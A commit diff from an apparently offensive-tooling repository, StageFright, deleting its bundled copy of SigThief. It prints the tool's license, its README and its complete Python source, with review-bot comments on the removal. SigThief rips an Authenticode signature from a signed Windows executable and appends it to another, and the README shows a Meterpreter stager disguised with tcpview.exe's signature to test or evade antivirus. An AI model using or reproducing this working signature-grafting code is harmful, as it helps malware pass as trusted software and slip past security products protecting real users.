Delete StageFright/StageFright/StageFright/Resources/SigThief directory

assume-breach 1 year ago
parent
commit
6c0a0ce77a

+ 0 - 29
StageFright/StageFright/StageFright/Resources/SigThief/LICENSE

@@ -1,29 +0,0 @@
-BSD 3-Clause License
-
-Copyright (c) 2017, Josh Pitts
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-  list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-  this list of conditions and the following disclaimer in the documentation
-  and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-  contributors may be used to endorse or promote products derived from
-  this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
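Review bot: Deleting this BSD 3-Clause text is only safe if no SigThief code survives elsewhere in the tree, because the first two conditions in the file require the notice "Copyright (c) 2017, Josh Pitts" to stay with any source or binary redistribution. Before merging, search the project for copied portions of sigthief.py or bundled builds of it and, if any remain, keep this notice alongside them.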

+ 0 - 93
StageFright/StageFright/StageFright/Resources/SigThief/README.md

@@ -1,93 +0,0 @@
-# SigThief
-
-New version available to Dev-tier sponsors: https://github.com/sponsors/secretsquirrel
-
-Stable tier will have it End of Month August 2021
-
----
-Stealing Signatures and Making One Invalid Signature at a Time (Unless you read this:
-https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf)
-
-https://twitter.com/subTee/status/912769644473098240
-![alt text](https://i.imgur.com/T05kwwn.png "https://twitter.com/subTee/status/912769644473098240")
-
-## For security professionals only...
-
-## What is this?
-
-I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.
-
-So I'm releasing this tool to let you quickly do your testing and feel free to report it to vendors or not. 
-
-In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file. 
-
-Of course it's **not a valid signature** and that's the point!
-
-I look forward to hearing about your results!
-
-
-## How to use
-
-### Usage
-```
-Usage: sigthief.py [options]
-
-Options:
-  -h, --help            show this help message and exit
-  -i FILE, --file=FILE  input file
-  -r, --rip             rip signature off inputfile
-  -a, --add             add signautre to targetfile
-  -o OUTPUTFILE, --output=OUTPUTFILE
-                        output file
-  -s SIGFILE, --sig=SIGFILE
-                        binary signature from disk
-  -t TARGETFILE, --target=TARGETFILE
-                        file to append signature too
-  -c, --checksig        file to check if signed; does not verify signature
-  -T, --truncate        truncate signature (i.e. remove sig)
-```
-
-### Take a Signature from a binary and add it to another binary
-```
-$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
-Output file: /tmp/msftesting_tcpview.exe
-Signature appended. 
-FIN.
-```
-
-### Save Signature to disk for use later
-```
-$ ./sigthief.py -i tcpview.exe -r                                                        
-Ripping signature to file!
-Output file: tcpview.exe_sig
-Signature ripped. 
-FIN.
-
-```
-
-### Use the ripped signature
-```
-$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
-Output file: x86_meterpreter_stager.exe_signed
-Signature appended. 
-FIN.
-
-```
-
-### Truncate (remove) signature
-This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)
-
-```
-$ ./sigthief.py -i tcpview.exe -T    
-Inputfile is signed!
-Output file: tcpview.exe_nosig
-Overwriting certificate table pointer and truncating binary
-Signature removed. 
-FIN.
-```
-
-### Check if there is a signature (does not check validity)
-```
-$ ./sigthief.py -i tcpview.exe -c
-Inputfile is signed!
-```
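Review bot: The commit message says only that the directory is deleted and gives no reason, while this README documented a user-visible capability (the Usage block and the rip, add, truncate and check examples). Add a sentence to the commit body or to the project's own README stating whether the signature-copying step is dropped or replaced, so StageFright's documentation and options do not keep pointing at a tool that no longer ships.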

+ 0 - 269
StageFright/StageFright/StageFright/Resources/SigThief/sigthief.py

@@ -1,269 +0,0 @@
-#!/usr/bin/env python3
-# LICENSE: BSD-3
-# Copyright: Josh Pitts @midnite_runr
-
-import sys
-import struct
-import shutil
-import io
-from optparse import OptionParser
-
-
-def gather_file_info_win(binary):
-        """
-        Borrowed from BDF...
-        I could just skip to certLOC... *shrug*
-        """
-        flItms = {}
-        binary = open(binary, 'rb')
-        binary.seek(int('3C', 16))
-        flItms['buffer'] = 0
-        flItms['JMPtoCodeAddress'] = 0
-        flItms['dis_frm_pehdrs_sectble'] = 248
-        flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
-        # Start of COFF
-        flItms['COFF_Start'] = flItms['pe_header_location'] + 4
-        binary.seek(flItms['COFF_Start'])
-        flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
-        binary.seek(flItms['COFF_Start'] + 2, 0)
-        flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
-        binary.seek(flItms['COFF_Start'] + 16, 0)
-        flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
-        #End of COFF
-        flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
-
-        #if flItms['SizeOfOptionalHeader']:
-            #Begin Standard Fields section of Optional Header
-        binary.seek(flItms['OptionalHeader_start'])
-        flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
-        flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
-        flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
-        flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
-        flItms['SizeOfUninitializedData'] = struct.unpack("<I",
-                                                               binary.read(4))[0]
-        flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
-        flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
-        if flItms['Magic'] != 0x20B:
-            flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
-        # End Standard Fields section of Optional Header
-        # Begin Windows-Specific Fields of Optional Header
-        if flItms['Magic'] == 0x20B:
-            flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
-        else:
-            flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
-                                                                   binary.read(2))[0]
-        flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
-                                                                   binary.read(2))[0]
-        flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['SizeOfImageLoc'] = binary.tell()
-        flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
-        if flItms['Magic'] == 0x20B:
-            flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
-            flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
-            flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
-            flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
-
-        else:
-            flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
-            flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
-            flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
-            flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
-        flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
-        # End Windows-Specific Fields of Optional Header
-        # Begin Data Directories of Optional Header
-        flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
-        #ImportTable SIZE|LOC
-        flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
-        flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
-        flItms['CertTableLOC'] = binary.tell()
-        flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
-        flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
-        binary.close()
-        return flItms
-
-
-def copyCert(exe):
-    flItms = gather_file_info_win(exe)
-
-    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
-        # not signed
-        print("Input file Not signed!")
-        sys.exit(-1)
-
-    with open(exe, 'rb') as f:
-        f.seek(flItms['CertLOC'], 0)
-        cert = f.read(flItms['CertSize'])
-    return cert
-
-
-def writeCert(cert, exe, output):
-    flItms = gather_file_info_win(exe)
-    
-    if not output: 
-        output = output = str(exe) + "_signed"
-
-    shutil.copy2(exe, output)
-    
-    print("Output file: {0}".format(output))
-
-    with open(exe, 'rb') as g:
-        with open(output, 'wb') as f:
-            f.write(g.read())
-            f.seek(0)
-            f.seek(flItms['CertTableLOC'], 0)
-            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
-            f.write(struct.pack("<I", len(cert)))
-            f.seek(0, io.SEEK_END)
-            f.write(cert)
-
-    print("Signature appended. \nFIN.")
-
-
-def outputCert(exe, output):
-    cert = copyCert(exe)
-    if not output:
-        output = str(exe) + "_sig"
-
-    print("Output file: {0}".format(output))
-
-    open(output, 'wb').write(cert)
-
-    print("Signature ripped. \nFIN.")
-
-
-def check_sig(exe):
-    flItms = gather_file_info_win(exe)
- 
-    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
-        # not signed
-        print("Inputfile Not signed!")
-    else:
-        print("Inputfile is signed!")
-
-
-def truncate(exe, output):
-    flItms = gather_file_info_win(exe)
- 
-    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
-        # not signed
-        print("Inputfile Not signed!")
-        sys.exit(-1)
-    else:
-        print( "Inputfile is signed!")
-
-    if not output:
-        output = str(exe) + "_nosig"
-
-    print("Output file: {0}".format(output))
-
-    shutil.copy2(exe, output)
-
-    with open(output, "r+b") as binary:
-        print('Overwriting certificate table pointer and truncating binary')
-        binary.seek(-flItms['CertSize'], io.SEEK_END)
-        binary.truncate()
-        binary.seek(flItms['CertTableLOC'], 0)
-        binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
-
-    print("Signature removed. \nFIN.")
-
-
-def signfile(exe, sigfile, output):
-    flItms = gather_file_info_win(exe)
-    
-    cert = open(sigfile, 'rb').read()
-
-    if not output: 
-        output = output = str(exe) + "_signed"
-
-    shutil.copy2(exe, output)
-    
-    print("Output file: {0}".format(output))
-    
-    with open(exe, 'rb') as g:
-        with open(output, 'wb') as f:
-            f.write(g.read())
-            f.seek(0)
-            f.seek(flItms['CertTableLOC'], 0)
-            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
-            f.write(struct.pack("<I", len(cert)))
-            f.seek(0, io.SEEK_END)
-            f.write(cert)
-    print("Signature appended. \nFIN.")
-
-
-if __name__ == "__main__":
-    usage = 'usage: %prog [options]'
-    print("\n\n!! New Version available now for Dev Tier Sponsors! Sponsor here: https://github.com/sponsors/secretsquirrel\n\n")
-    parser = OptionParser()
-    parser.add_option("-i", "--file", dest="inputfile", 
-                  help="input file", metavar="FILE")
-    parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
-                  help='rip signature off inputfile')
-    parser.add_option('-a', '--add', dest='addsig', action='store_true',
-                  help='add signautre to targetfile')
-    parser.add_option('-o', '--output', dest='outputfile',
-                  help='output file')
-    parser.add_option('-s', '--sig', dest='sigfile',
-                  help='binary signature from disk')
-    parser.add_option('-t', '--target', dest='targetfile',
-                  help='file to append signature to')
-    parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
-                  help='file to check if signed; does not verify signature')
-    parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
-                  help='truncate signature (i.e. remove sig)')
-    (options, args) = parser.parse_args()
-    
-    # rip signature
-    # inputfile and rip to outputfile
-    if options.inputfile and options.ripsig:
-        print("Ripping signature to file!")
-        outputCert(options.inputfile, options.outputfile)
-        sys.exit()    
-
-    # copy from one to another
-    # inputfile and rip to targetfile to outputfile    
-    if options.inputfile and options.targetfile:
-        cert = copyCert(options.inputfile)
-        writeCert(cert, options.targetfile, options.outputfile)
-        sys.exit()
-
-    # check signature
-    # inputfile 
-    if options.inputfile and options.checksig:
-        check_sig(options.inputfile) 
-        sys.exit()
-
-    # add sig to target file
-    if options.targetfile and options.sigfile:
-        signfile(options.targetfile, options.sigfile, options.outputfile)
-        sys.exit()
-        
-    # truncate
-    if options.inputfile and options.truncate:
-        truncate(options.inputfile, options.outputfile)
-        sys.exit()
-
-    parser.print_help()
-    parser.error("You must do something!")
-
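Review bot: This commit as shown touches only the three files under Resources/SigThief, so anything that still references Resources/SigThief/sigthief.py (a project resource entry, or code that extracts and runs the script) will now fail at build time or at run time; remove or guard those references in the same change. For anyone auditing what was removed, the help text for -c states it "does not verify signature", and check_sig() only tests CertLOC and CertSize for zero, so its "Inputfile is signed!" result was a presence check on the certificate table and never a trust decision.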